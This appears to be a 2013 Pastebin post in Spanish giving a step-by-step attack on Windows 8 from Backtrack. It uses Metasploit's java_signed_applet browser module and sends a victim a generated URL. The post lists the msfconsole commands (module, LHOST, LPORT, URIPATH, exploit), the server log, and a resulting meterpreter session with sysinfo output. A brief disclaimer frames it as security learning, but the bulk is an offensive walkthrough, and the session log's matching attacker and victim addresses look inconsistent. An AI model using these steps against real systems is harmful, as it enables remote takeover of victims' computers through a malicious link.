Advertisement
Mayk0

#; Explotando Windows 8 Desde Backtrack!

Apr 16th, 2013
188
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.20 KB | None | 0 0
  1. Bueno primero que nada quiero hacerles una breve explcasion Esto se Crea con fines de Mejorar la seguridad en Windows 8, Mucha gente lo Usa con fines destructivos, Eso queda a cargo de Ustedes Amen de enseñar a destrucir Miren el Lado positivo, Siempre que aprendan atacar, deben tener un AS bajo la manga de saber como defenderse del Mismo ataque en caso de que sea usado en contra de ustedes mismos, Recuerdenlo!
  2.  
  3. Ok, Empecemos con una Leve introduccion sobre Windows 8.
  4.  
  5. Segun Wikipedia: Windows 8 es la versión actual del sistema operativo de Microsoft Windows, producido por Microsoft para su uso en computadoras personales, incluidas computadoras de escritorio en casa y de negocios, computadoras portátiles, netbooks, tabletas, servidores y centros multimedia. Añade soporte para microprocesadores ARM, además de los microprocesadores tradicionales x86 de Intel y AMD. Su interfaz de usuario ha sido modificada para hacerla más adecuada para su uso con pantallas táctiles, además de los tradicionales ratón y teclado.
  6.  
  7. El procedimiento que realize para comprometer la seguridad de Windows 8 son los siguientes:
  8.  
  9. REQUERIMIENTOS:
  10.  
  11. - Backtrack 5 R1 - R2 o R3 (Atacante)
  12. - Metasploit Framework (Atacante)
  13. - Windows 8 (Victima)
  14. - Google Chorme, Firefox o IE (Victima)
  15.  
  16. PROCEDIMIENTO DEL ATAQUE:
  17. Abrimos Metasploit (msfconsole) y ejecutamos los siguientes comandos:
  18.  
  19. -----------------------------------------------------
  20. Codigo:
  21. use exploit/multi/browser/java_signed_applet (Modulo Java para diferentes navegadores)
  22. set lhost 192.168.1.17 (IP del Atacante)
  23. set lport 80 (Puerto)
  24. set uripath / (Path del link a enviar)
  25. exploit
  26. -----------------------------------------------------
  27.  
  28. msf> use exploit/multi/browser/java_signed_applet
  29. msf> exploit(java_signed_applet) > set LHOST 192.168.1.17(Ip Atackante)
  30. LHOST => 192.168.1.17
  31. msf> exploit(java_signed_applet) > set LPORT 80
  32. LPORT => 80
  33. msf> exploit(java_signed_applet) > set URIPATH /
  34. URIPATH => /
  35. msf> exploit(java_signed_applet) > exploit
  36.  
  37. Despues de ejecutar los comandos mencionados, MSF generara una URL (http://192.168.1.17:8080) que sera enviada a la victima con Windows 8, esta contendra un archivo (.exe) que se autoejecutara al momento de abrirlo en cualquier navegador web, ya sea en Internet Explorer 10 (version que integra Windows 8 ) Google Chorme, Opera o Firefox.
  38.  
  39. He aqui un ejemplo de la session meterpreter que se crea al momento de ejecutar la URL generada por Metasploit:
  40.  
  41. [*] Using URL: http://0.0.0.0:8080/
  42. [*] Local IP: http://192.168.1.17:8080
  43. [*] Server Started.
  44. [*] 192.168.1.17 java_signed_applet - Handling request
  45. [*] 192.168.1.17 java_signed_applet - Handling request
  46. [*] 192.168.1.17 java_signed_applet - Sending SiteLoader.jar. Waiting for user to click
  47. [*] 192.168.1.17 java_signed_applet - Sending SiteLoader.jar. Waiting for user to click
  48. [*] 192.168.1.17 java_signed_applet - Sending SiteLoader.jar. Waiting for user to click
  49. [*] 192.168.1.17 java_signed_applet - Handling request
  50.  
  51. Esto quiere decir que hemos VULNERADO el Windows 8 con una simple URL, seguidamente ejecutaremos los comandos correspondientes para obtener la informacion del sistema.
  52.  
  53. msf exploit(java_signed_applet) > sessions -l
  54.  
  55. Active sessions
  56. ===============
  57.  
  58. Id Type Information Connection
  59. -- ---- ----------- ----------
  60. 1 meterpreter x86/win32 CL-Security\Caleb @ CL-Security 192.168.1.17:80 -> 192.168.1.17:80
  61.  
  62. msf exploit(java_signed_applet) > sessions -i l
  63. [*] Starting interaction with l...
  64.  
  65. meterpreter > sysinfo
  66. Computer : CL-Security
  67. OD : Windows 8 (Build 8400)
  68. Architecture : x86
  69. System Language : es_ES
  70. Meterpreter : x86/win32
  71. meterpreter > pwd
  72. C:\Users\Caleb\Desktop
  73. meterpreter >
  74.  
  75. Las pruebas fueron realizadas en el Sistema Operativo Windows 8 con el Firewall, Windows Defender, Actualizaciones Automaticas, Internet Explorer 10 (modo seguro) respectivamente ACTIVADO.
  76.  
  77. Si desean realizar sus propias Pruebas de Seguridad, pueden descargar el Windows 8 e instalarlo en una Maquina Virtual, recomendable usar el VMWARE.
  78.  
  79. Atte: Mayk0
  80.  
  81. Contacto!: http://www.facebook.com/Maaykooo
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement